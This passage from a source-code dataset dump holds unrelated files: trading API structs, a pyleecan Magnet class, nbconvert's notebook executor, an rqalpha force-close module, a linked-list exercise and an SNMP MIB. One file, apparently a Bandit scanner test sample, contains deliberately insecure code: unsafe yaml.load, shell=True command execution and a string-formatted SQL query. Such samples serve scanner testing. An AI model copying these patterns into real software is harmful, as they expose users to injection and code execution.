CThostFtdcReqUserLoginWithTextField = {
"TradingDay": "string",
"BrokerID": "string",
"UserID": "string",
"Password": "string",
"UserProductInfo": "string",
"InterfaceProductInfo": "string",
"ProtocolInfo": "string",
"MacAddress": "string",
"ClientIPAddress": "string",
"LoginRemark": "string",
"Text": "string",
"ClientIPPort": "int",
}
CThostFtdcReqUserLoginWithOTPField = {
"TradingDay": "string",
"BrokerID": "string",
"UserID": "string",
"Password": "string",
"UserProductInfo": "string",
"InterfaceProductInfo": "string",
"ProtocolInfo": "string",
"MacAddress": "string",
"ClientIPAddress": "string",
"LoginRemark": "string",
"OTPPassword": "string",
"ClientIPPort": "int",
}
CThostFtdcReqApiHandshakeField = {
"CryptoKeyVersion": "string",
}
CThostFtdcRspApiHandshakeField = {
"FrontHandshakeDataLen": "int",
"FrontHandshakeData": "string",
"IsApiAuthEnabled": "int",
}
CThostFtdcReqVerifyApiKeyField = {
"ApiHandshakeDataLen": "int",
"ApiHandshakeData": "string",
}
CThostFtdcDepartmentUserField = {
"BrokerID": "string",
"UserID": "string",
"InvestorRange": "char",
"InvestorID": "string",
}
CThostFtdcQueryFreqField = {
"QueryFreq": "int",
}
| 24.87309 | 51 | 0.598508 | [
"MIT"
] | 1122455801/vnpy | vnpy/api/ctp/generator/ctp_struct.py | 122,102 | Python |
from tranzact.util.byte_types import make_sized_bytes
bytes4 = make_sized_bytes(4)
bytes8 = make_sized_bytes(8)
bytes32 = make_sized_bytes(32)
bytes48 = make_sized_bytes(48)
bytes96 = make_sized_bytes(96)
bytes100 = make_sized_bytes(100)
bytes480 = make_sized_bytes(480)
| 27.2 | 53 | 0.819853 | [
"Apache-2.0"
] | Tranzact-Network/tranzact-blockchain | tranzact/types/blockchain_format/sized_bytes.py | 272 | Python |
# -*- coding: utf-8 -*-
# File generated according to Generator/ClassesRef/Machine/Magnet.csv
# WARNING! All changes made in this file will be lost!
"""Method code available at https://github.com/Eomys/pyleecan/tree/master/pyleecan/Methods/Machine/Magnet
"""
from os import linesep
from sys import getsizeof
from logging import getLogger
from ._check import check_var, raise_
from ..Functions.get_logger import get_logger
from ..Functions.save import save
from ..Functions.copy import copy
from ..Functions.load import load_init_dict
from ..Functions.Load.import_class import import_class
from ._frozen import FrozenClass
from ._check import InitUnKnowClassError
from .Material import Material
class Magnet(FrozenClass):
"""Magnet class"""
VERSION = 1
# save and copy methods are available in all object
save = save
copy = copy
# get_logger method is available in all object
get_logger = get_logger
def __init__(
self,
mat_type=-1,
type_magnetization=0,
Lmag=0.95,
init_dict=None,
init_str=None,
):
"""Constructor of the class. Can be use in three ways :
- __init__ (arg1 = 1, arg3 = 5) every parameters have name and default values
for pyleecan type, -1 will call the default constructor
- __init__ (init_dict = d) d must be a dictionary with property names as keys
- __init__ (init_str = s) s must be a string
s is the file path to load
ndarray or list can be given for Vector and Matrix
object or dict can be given for pyleecan Object"""
if init_str is not None: # Load from a file
init_dict = load_init_dict(init_str)[1]
if init_dict is not None: # Initialisation by dict
assert type(init_dict) is dict
# Overwrite default value with init_dict content
if "mat_type" in list(init_dict.keys()):
mat_type = init_dict["mat_type"]
if "type_magnetization" in list(init_dict.keys()):
type_magnetization = init_dict["type_magnetization"]
if "Lmag" in list(init_dict.keys()):
Lmag = init_dict["Lmag"]
        # Set the properties (value check and conversion are done in setter)
self.parent = None
self.mat_type = mat_type
self.type_magnetization = type_magnetization
self.Lmag = Lmag
# The class is frozen, for now it's impossible to add new properties
self._freeze()
def __str__(self):
"""Convert this object in a readeable string (for print)"""
Magnet_str = ""
if self.parent is None:
Magnet_str += "parent = None " + linesep
else:
Magnet_str += "parent = " + str(type(self.parent)) + " object" + linesep
if self.mat_type is not None:
tmp = self.mat_type.__str__().replace(linesep, linesep + "\t").rstrip("\t")
Magnet_str += "mat_type = " + tmp
else:
Magnet_str += "mat_type = None" + linesep + linesep
Magnet_str += "type_magnetization = " + str(self.type_magnetization) + linesep
Magnet_str += "Lmag = " + str(self.Lmag) + linesep
return Magnet_str
def __eq__(self, other):
"""Compare two objects (skip parent)"""
if type(other) != type(self):
return False
if other.mat_type != self.mat_type:
return False
if other.type_magnetization != self.type_magnetization:
return False
if other.Lmag != self.Lmag:
return False
return True
def compare(self, other, name="self", ignore_list=None):
"""Compare two objects and return list of differences"""
if ignore_list is None:
ignore_list = list()
if type(other) != type(self):
return ["type(" + name + ")"]
diff_list = list()
if (other.mat_type is None and self.mat_type is not None) or (
other.mat_type is not None and self.mat_type is None
):
diff_list.append(name + ".mat_type None mismatch")
elif self.mat_type is not None:
diff_list.extend(
self.mat_type.compare(other.mat_type, name=name + ".mat_type")
)
if other._type_magnetization != self._type_magnetization:
diff_list.append(name + ".type_magnetization")
if other._Lmag != self._Lmag:
diff_list.append(name + ".Lmag")
# Filter ignore differences
diff_list = list(filter(lambda x: x not in ignore_list, diff_list))
return diff_list
def __sizeof__(self):
"""Return the size in memory of the object (including all subobject)"""
S = 0 # Full size of the object
S += getsizeof(self.mat_type)
S += getsizeof(self.type_magnetization)
S += getsizeof(self.Lmag)
return S
def as_dict(self, **kwargs):
"""
        Convert this object into a JSON serializable dict (can be used in __init__).
Optional keyword input parameter is for internal use only
and may prevent json serializability.
"""
Magnet_dict = dict()
if self.mat_type is None:
Magnet_dict["mat_type"] = None
else:
Magnet_dict["mat_type"] = self.mat_type.as_dict(**kwargs)
Magnet_dict["type_magnetization"] = self.type_magnetization
Magnet_dict["Lmag"] = self.Lmag
# The class name is added to the dict for deserialisation purpose
Magnet_dict["__class__"] = "Magnet"
return Magnet_dict
def _set_None(self):
"""Set all the properties to None (except pyleecan object)"""
if self.mat_type is not None:
self.mat_type._set_None()
self.type_magnetization = None
self.Lmag = None
def _get_mat_type(self):
"""getter of mat_type"""
return self._mat_type
def _set_mat_type(self, value):
"""setter of mat_type"""
if isinstance(value, str): # Load from file
value = load_init_dict(value)[1]
if isinstance(value, dict) and "__class__" in value:
class_obj = import_class(
"pyleecan.Classes", value.get("__class__"), "mat_type"
)
value = class_obj(init_dict=value)
elif type(value) is int and value == -1: # Default constructor
value = Material()
check_var("mat_type", value, "Material")
self._mat_type = value
if self._mat_type is not None:
self._mat_type.parent = self
mat_type = property(
fget=_get_mat_type,
fset=_set_mat_type,
doc=u"""The Magnet material
:Type: Material
""",
)
def _get_type_magnetization(self):
"""getter of type_magnetization"""
return self._type_magnetization
def _set_type_magnetization(self, value):
"""setter of type_magnetization"""
check_var("type_magnetization", value, "int", Vmin=0, Vmax=3)
self._type_magnetization = value
type_magnetization = property(
fget=_get_type_magnetization,
fset=_set_type_magnetization,
doc=u"""Permanent magnet magnetization type: 0 for radial, 1 for parallel, 2 for Hallbach, 3 Tangential
:Type: int
:min: 0
:max: 3
""",
)
def _get_Lmag(self):
"""getter of Lmag"""
return self._Lmag
def _set_Lmag(self, value):
"""setter of Lmag"""
check_var("Lmag", value, "float", Vmin=0)
self._Lmag = value
Lmag = property(
fget=_get_Lmag,
fset=_set_Lmag,
doc=u"""Magnet axial length
:Type: float
:min: 0
""",
)
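# Usage sketch for the class above; the numeric values are illustrative
# assumptions, not defaults taken from any machine, and equality of the
# round-tripped copy assumes Material also round-trips through as_dict.
if __name__ == "__main__":
    magnet = Magnet(mat_type=-1, type_magnetization=0, Lmag=0.5)  # keyword arguments, -1 builds a default Material
    same_magnet = Magnet(init_dict=magnet.as_dict())  # rebuild from a plain dict, as described in __init__
    print(magnet.compare(same_magnet, name="magnet"))  # expected: an empty list of differences
    # Magnet(init_str="path/to/magnet.json") would load from a previously saved file (path is hypothetical)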
| 34.087719 | 111 | 0.610782 | [
"Apache-2.0"
] | mjfwest/pyleecan | pyleecan/Classes/Magnet.py | 7,772 | Python |
"""Module containing a preprocessor that removes the outputs from code cells"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import os
from textwrap import dedent
try:
from queue import Empty # Py 3
except ImportError:
from Queue import Empty # Py 2
from traitlets import List, Unicode, Bool
from nbformat.v4 import output_from_msg
from .base import Preprocessor
from ..utils.exceptions import ConversionException
from traitlets import Integer
class CellExecutionError(ConversionException):
"""
Custom exception to propagate exceptions that are raised during
notebook execution to the caller. This is mostly useful when
    using nbconvert as a library, since it allows failures to be
    handled gracefully.
"""
def __init__(self, traceback):
self.traceback = traceback
class ExecutePreprocessor(Preprocessor):
"""
Executes all the cells in a notebook
"""
timeout = Integer(30, config=True,
help="The time to wait (in seconds) for output from executions."
)
interrupt_on_timeout = Bool(
False, config=True,
help=dedent(
"""
If execution of a cell times out, interrupt the kernel and
continue executing other cells rather than throwing an error and
stopping.
"""
)
)
allow_errors = Bool(
False, config=True,
help=dedent(
"""
If `True`, a `CellExecutionError` is raised if any of the notebook
cells raises an exception during execution. Otherwise, execution
is continued and the output from the exception is included in the
cell output.
"""
)
)
extra_arguments = List(Unicode())
def preprocess(self, nb, resources):
path = resources.get('metadata', {}).get('path', '')
if path == '':
path = None
from jupyter_client.manager import start_new_kernel
kernel_name = nb.metadata.get('kernelspec', {}).get('name', 'python')
self.log.info("Executing notebook with kernel: %s" % kernel_name)
self.km, self.kc = start_new_kernel(
kernel_name=kernel_name,
extra_arguments=self.extra_arguments,
stderr=open(os.devnull, 'w'),
cwd=path)
self.kc.allow_stdin = False
try:
nb, resources = super(ExecutePreprocessor, self).preprocess(nb, resources)
finally:
self.kc.stop_channels()
self.km.shutdown_kernel(now=True)
return nb, resources
def preprocess_cell(self, cell, resources, cell_index):
"""
Apply a transformation on each code cell. See base.py for details.
"""
if cell.cell_type != 'code':
return cell, resources
outputs = self.run_cell(cell)
cell.outputs = outputs
if not self.allow_errors:
for out in outputs:
if out.output_type == 'error':
pattern = """\
An error occurred while executing the following cell:
------------------
{cell.source}
------------------
{out.ename}: {out.evalue}
"""
msg = dedent(pattern).format(out=out, cell=cell)
raise CellExecutionError(msg)
return cell, resources
def run_cell(self, cell):
msg_id = self.kc.execute(cell.source)
self.log.debug("Executing cell:\n%s", cell.source)
# wait for finish, with timeout
while True:
try:
msg = self.kc.shell_channel.get_msg(timeout=self.timeout)
except Empty:
self.log.error("""Timeout waiting for execute reply (%is).
If your cell should take longer than this, you can increase the timeout with:
c.ExecutePreprocessor.timeout = SECONDS
in jupyter_nbconvert_config.py
""" % self.timeout)
if self.interrupt_on_timeout:
self.log.error("Interrupting kernel")
self.km.interrupt_kernel()
break
else:
try:
exception = TimeoutError
except NameError:
exception = RuntimeError
raise exception("Cell execution timed out, see log"
" for details.")
if msg['parent_header'].get('msg_id') == msg_id:
break
else:
# not our reply
continue
outs = []
while True:
try:
msg = self.kc.iopub_channel.get_msg(timeout=self.timeout)
except Empty:
self.log.warn("Timeout waiting for IOPub output")
break
if msg['parent_header'].get('msg_id') != msg_id:
# not an output from our execution
continue
msg_type = msg['msg_type']
self.log.debug("output: %s", msg_type)
content = msg['content']
# set the prompt number for the input and the output
if 'execution_count' in content:
cell['execution_count'] = content['execution_count']
if msg_type == 'status':
if content['execution_state'] == 'idle':
break
else:
continue
elif msg_type == 'execute_input':
continue
elif msg_type == 'clear_output':
outs = []
continue
elif msg_type.startswith('comm'):
continue
try:
out = output_from_msg(msg)
except ValueError:
self.log.error("unhandled iopub msg: " + msg_type)
else:
outs.append(out)
return outs
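# Usage sketch for the preprocessor above: execute a notebook from disk and save
# the result. The file names are assumptions; only traits defined in this class
# (timeout, allow_errors) are configured, and the "path" entry is the one read
# by preprocess() to decide where the kernel starts.
if __name__ == "__main__":
    import nbformat
    nb = nbformat.read("example.ipynb", as_version=4)
    ep = ExecutePreprocessor(timeout=120, allow_errors=False)
    try:
        nb, resources = ep.preprocess(nb, {"metadata": {"path": "."}})
    except CellExecutionError:
        raise  # with allow_errors=False the first failing cell surfaces here
    nbformat.write(nb, "example_executed.ipynb")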
| 32.221053 | 93 | 0.542143 | [
"MIT"
] | wagnermarkd/stationary-hud | env/lib/python2.7/site-packages/nbconvert/preprocessors/execute.py | 6,122 | Python |
from rqalpha.interface import AbstractMod
from rqalpha.apis import *
from rqalpha.events import EVENT
from collections import defaultdict
import datetime
import os
class ForceClose(AbstractMod):
def __init__(self):
self._log_dir = None
self._log_file = defaultdict(lambda: None)
self._force_close_time = []
def start_up(self, env, mod_config):
for timespan in mod_config.force_close_time:
v = timespan.split('-')
assert len(v) == 2, "%s invalid" % mod_config.force_close_time
start_time_v = v[0].split(':')
end_time_v = v[1].split(':')
assert len(start_time_v) == 2, "%s invalid" % mod_config.force_close_time
assert len(end_time_v) == 2, "%s invalid" % mod_config.force_close_time
self._force_close_time.append({'start': {'hour': int(start_time_v[0]), 'minute': int(start_time_v[1])},
'end': {'hour': int(end_time_v[0]), 'minute': int(end_time_v[1])}})
if "log_dir" in mod_config.keys():
self._log_dir = mod_config.log_dir
if os.path.exists(self._log_dir) is False:
os.makedirs(self._log_dir)
# env.event_bus.add_listener(EVENT.BAR, self._check_force_close)
env.event_bus.prepend_listener(EVENT.BAR, self._check_force_close)
def tear_down(self, success, exception=None):
for f in self._log_file.values():
if f:
f.close()
def _check_force_close(self, event):
contract_list = list(event.bar_dict.keys())
for contract in contract_list:
event.bar_dict[contract].force_close = False
cur_time = event.calendar_dt
force_close = False
for ft in self._force_close_time:
start_time = cur_time.replace(hour=ft['start']['hour'], minute=ft['start']['minute'])
end_time = cur_time.replace(hour=ft['end']['hour'], minute=ft['end']['minute'])
if start_time <= cur_time <= end_time:
force_close = True
break
if force_close:
contract_list = list(event.bar_dict.keys())
for contract in contract_list:
long_positions = get_position(contract, POSITION_DIRECTION.LONG)
short_positions = get_position(contract, POSITION_DIRECTION.SHORT)
if long_positions.quantity == 0 and short_positions.quantity == 0:
continue
# order_to(contract, 0)
event.bar_dict[contract].force_close = True
if not self._log_dir:
continue
if not self._log_file[contract]:
path = os.path.join(self._log_dir, contract + '_force_close.csv')
self._log_file[contract] = open(path, 'w')
msg = "%s,%s" % (str(cur_time), "FORCE_CLOSE")
self._log_file[contract].write(msg + "\n")
# return True
return
# print("call _calc_flow")
# if event.bar_dict._frequency != "1m":
# return
# if len(self._kline_bar) < self._kline_bar_cnt:
# self._kline_bar.append(event.)
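# Configuration sketch: each force_close_time entry must be an "HH:MM-HH:MM" span
# (see the split('-') parsing in start_up), and log_dir is optional. The time
# spans and the surrounding mod-config layout below are assumptions for
# illustration, not values taken from this repository.
example_mod_config = {
    "mod": {
        "force_close": {
            "enabled": True,
            "force_close_time": ["14:55-15:00", "22:55-23:00"],
            "log_dir": "./force_close_logs",
        }
    }
}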
| 44.287671 | 115 | 0.588308 | [
"Apache-2.0"
] | wzf92/rqalpha | rqalpha/mod/rqalpha_mod_force_close/mod.py | 3,233 | Python |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2018 damian <damian@C-DZ-E5500>
#
# Distributed under terms of the MIT license.
"""
"""
import subprocess
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import yaml
def read_file(filename):
    with open(filename) as f:
        # insecure on purpose: yaml.load without an explicit Loader can build arbitrary Python objects
        data = yaml.load(f.read())
    return data
def run_command(cmd):
    # insecure on purpose: shell=True lets a crafted cmd string inject extra shell commands
    return subprocess.check_call(cmd, shell=True)
db = create_engine('sqlite:///somedatabase')
Session = sessionmaker(bind=db)
def get_user(uid):
    session = Session()
    # insecure on purpose: string formatting builds the SQL, so uid can inject arbitrary SQL
    query = "select * from user where id='%s'" % uid
    return session.execute(query)
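# For contrast, safer counterparts of the three patterns above (sketch only;
# the query still targets the same hypothetical user table):
def read_file_safe(filename):
    with open(filename) as f:
        return yaml.safe_load(f)  # refuses to construct arbitrary Python objects
def run_command_safe(cmd_args):
    return subprocess.check_call(cmd_args)  # pass an argument list and avoid shell=True
def get_user_safe(uid):
    session = Session()
    # bind uid as a parameter instead of formatting it into the SQL string
    return session.execute("select * from user where id=:uid", {"uid": uid})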
| 19.757576 | 52 | 0.691718 | [
"Apache-2.0"
] | DamZiobro/coding_playground | bandit/insecureCode.py | 653 | Python |
# Python program to reverse a linked list
# Time Complexity : O(n)
# Space Complexity : O(1)
# Node Class
class Node:
# Constructor to initialize the node object
def __init__(self, data):
self.data = data
self.next = None # In python, None == null
class LinkedList:
# Constructor to initialize the linked list
def __init__(self):
self.head = None
# Function to insert a new node at the beginning
def push(self, data):
node = Node(data) # This is how you create an object in python
node.next = self.head
self.head = node
    # Function to insert a new node at the end
    def append(self, data):
        node = Node(data)
        if self.head is None:  # empty list: the new node becomes the head
            self.head = node
            return
        currentNode = self.head
        while currentNode.next is not None:
            currentNode = currentNode.next
        currentNode.next = node
# Function to remove a node
def remove(self, data):
currentNode = self.head
if currentNode.data == data:
self.head = self.head.next
return
while currentNode.next is not None:
if currentNode.next.data == data:
currentNode.next = currentNode.next.next
return
currentNode = currentNode.next
# Function to search for a node
def search(self, data):
currentNode = self.head
if currentNode.data == data:
return currentNode
        while currentNode.next is not None:
if currentNode.next.data == data:
return currentNode.next
currentNode = currentNode.next
return None
    # Function to reverse the linked list in place (O(1) extra space)
    def reverse(self):
        previous = None
        current = self.head
        while current is not None:
            next_node = current.next  # remember the rest of the list
            current.next = previous   # point the current node backwards
            previous = current
            current = next_node
        self.head = previous  # previous is now the new head
# Function to reverse the every k nodes in the linked list
def reverseWithK(self, head, k):
current = head
next = None
temp = None
count = 0
# Reverse first k nodes of the linked list
while(current is not None and count < k):
next = current.next
current.next = temp
temp = current
current = next
count += 1
# next is now a pointer to (k+1)th node
# recursively call for the list starting
# from current . And make rest of the list as
# next of first node (head)
if next is not None:
head.next = self.reverseWithK(next, k)
# temp is new head of the reversed list
return temp
# Utility function to print the linked list
def printList(self):
temp = self.head
while(temp):
            print(temp.data)
temp = temp.next
linkedlist = LinkedList()
linkedlist.push('Siddhant')
linkedlist.push('Rahul')
linkedlist.push('DSA-Library')
linkedlist.append('XYZ')
linkedlist.remove('XYZ')
linkedlist.reverse()
linkedlist.printList()
# Driver program
llist = LinkedList()
llist.push(9)
llist.push(8)
llist.push(7)
llist.push(6)
llist.push(5)
llist.push(4)
llist.push(3)
llist.push(2)
llist.push(1)
print("\nGiven linked list")
llist.printList()
llist.head = llist.reverseWithK(llist.head, 3)
print("\nReversed Linked list with k node")
llist.printList()
"""
Output =>
Siddhant
Rahul
DSA-Library
Given linked list
1
2
3
4
5
6
7
8
9
Reversed Linked list with k node
3
2
1
6
5
4
9
8
7
"""
| 21.87037 | 77 | 0.609088 | [
"MIT"
] | AayushTyagi1/DSA-Library | Data_Structures/LinkedList/Reverse_List/reverse_LinkedList.py | 3,543 | Python |
#
# PySNMP MIB module SENAO-ENTERPRISE-INDOOR-AP-CB-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/SENAO-ENTERPRISE-INDOOR-AP-CB-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:53:40 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
MibIdentifier, iso, ObjectIdentity, NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, Gauge32, Unsigned32, IpAddress, Integer32, Counter64, Counter32, ModuleIdentity, Bits, enterprises = mibBuilder.importSymbols("SNMPv2-SMI", "MibIdentifier", "iso", "ObjectIdentity", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "Gauge32", "Unsigned32", "IpAddress", "Integer32", "Counter64", "Counter32", "ModuleIdentity", "Bits", "enterprises")
MacAddress, DisplayString, TextualConvention, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "MacAddress", "DisplayString", "TextualConvention", "TruthValue")
senao = ModuleIdentity((1, 3, 6, 1, 4, 1, 14125))
if mibBuilder.loadTexts: senao.setLastUpdated('0511250000Z')
if mibBuilder.loadTexts: senao.setOrganization('Senao R&D Dept., S/W Division')
indoorWirelessDevice = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100))
entSystem = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 1))
entLAN = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 2))
entWAN = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 3))
entMacFilter = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 4))
entWlan = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 5))
entSNMP = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 6))
entWlanCommonInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1))
entPassword = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("writeonly")
if mibBuilder.loadTexts: entPassword.setStatus('mandatory')
entSysModel = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entSysModel.setStatus('mandatory')
entSysMode = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("ap-router", 0), ("repeater", 1), ("ap-bridge", 2), ("client-bridge", 3), ("client-router", 4), ("wds-bridge", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entSysMode.setStatus('mandatory')
entSysUpTime = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 5), TimeTicks()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entSysUpTime.setStatus('mandatory')
entHwVersion = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entHwVersion.setStatus('mandatory')
entSN = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entSN.setStatus('mandatory')
entKenelVersion = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 8), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entKenelVersion.setStatus('mandatory')
entAppVersion = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 9), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entAppVersion.setStatus('mandatory')
entReset = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 10), TruthValue()).setMaxAccess("writeonly")
if mibBuilder.loadTexts: entReset.setStatus('mandatory')
entResetToDefault = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 11), TruthValue()).setMaxAccess("writeonly")
if mibBuilder.loadTexts: entResetToDefault.setStatus('mandatory')
entApplyModules = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 12), TruthValue()).setMaxAccess("writeonly")
if mibBuilder.loadTexts: entApplyModules.setStatus('mandatory')
entLANIP = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 2, 1), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entLANIP.setStatus('mandatory')
entLANSubnetMask = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 2, 2), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entLANSubnetMask.setStatus('mandatory')
entSTPEnable = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 2, 3), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entSTPEnable.setStatus('mandatory')
entDHCPEnable = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 2, 4), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entDHCPEnable.setStatus('mandatory')
entIPPoolStart = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 2, 5), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entIPPoolStart.setStatus('mandatory')
entIPPoolEnd = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 2, 6), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entIPPoolEnd.setStatus('mandatory')
entIPLeaseTime = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 2, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6, 7, 8))).clone(namedValues=NamedValues(("half-hour", 0), ("one-hour", 1), ("two-hours", 2), ("half-day", 3), ("one-day", 4), ("two-days", 5), ("one-week", 6), ("two-weeks", 7), ("forever", 8)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entIPLeaseTime.setStatus('mandatory')
entRouterEnable = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 3, 1), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entRouterEnable.setStatus('mandatory')
entLanMacFilteringEnable = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 4, 1), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entLanMacFilteringEnable.setStatus('mandatory')
entLanMacFilteringMode = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 4, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("white-list", 0), ("black-list", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entLanMacFilteringMode.setStatus('mandatory')
entLanMacFilterTable = MibTable((1, 3, 6, 1, 4, 1, 14125, 100, 4, 3), )
if mibBuilder.loadTexts: entLanMacFilterTable.setStatus('current')
entLanMacFilterEntry = MibTableRow((1, 3, 6, 1, 4, 1, 14125, 100, 4, 3, 1), ).setIndexNames((0, "SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "entMacAddressIndex"))
if mibBuilder.loadTexts: entLanMacFilterEntry.setStatus('current')
entMacAddressIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 4, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entMacAddressIndex.setStatus('current')
entMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 4, 3, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entMacAddress.setStatus('current')
entMacFilteringValid = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 4, 3, 1, 3), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entMacFilteringValid.setStatus('current')
entOpMode = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))).clone(namedValues=NamedValues(("ap", 0), ("client-bridge", 1), ("wds-bridge", 2), ("repeater", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entOpMode.setStatus('mandatory')
entRadio = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 2), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entRadio.setStatus('mandatory')
entAPMode = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("ap", 0), ("wds", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entAPMode.setStatus('mandatory')
entBand = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 4, 6, 7, 8, 9))).clone(namedValues=NamedValues(("ieee802dot11-b-g", 0), ("ieee802dot11-b", 1), ("ieee802dot11-a", 2), ("ieee802dot11-g", 4), ("ieee802dot11-n", 6), ("ieee802dot11-g-n", 7), ("ieee802dot11-a-n", 8), ("ieee802dot11-b-g-n", 9)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entBand.setStatus('mandatory')
entESSIDNum = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 4))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entESSIDNum.setStatus('mandatory')
entChannel = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 14))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entChannel.setStatus('mandatory')
entDataRate = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 5, 11, 6, 9, 12, 18, 24, 36, 48, 54))).clone(namedValues=NamedValues(("auto", 0), ("oneMbps", 1), ("twoMbps", 2), ("fiveNhalfMbps", 5), ("elevenMbps", 11), ("sixMbps", 6), ("nineMbps", 9), ("twelveMbps", 12), ("eighteenMbps", 18), ("twentytwoMbps", 24), ("thirtysixMbps", 36), ("fortyeightMbps", 48), ("fiftyfourMbps", 54)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entDataRate.setStatus('mandatory')
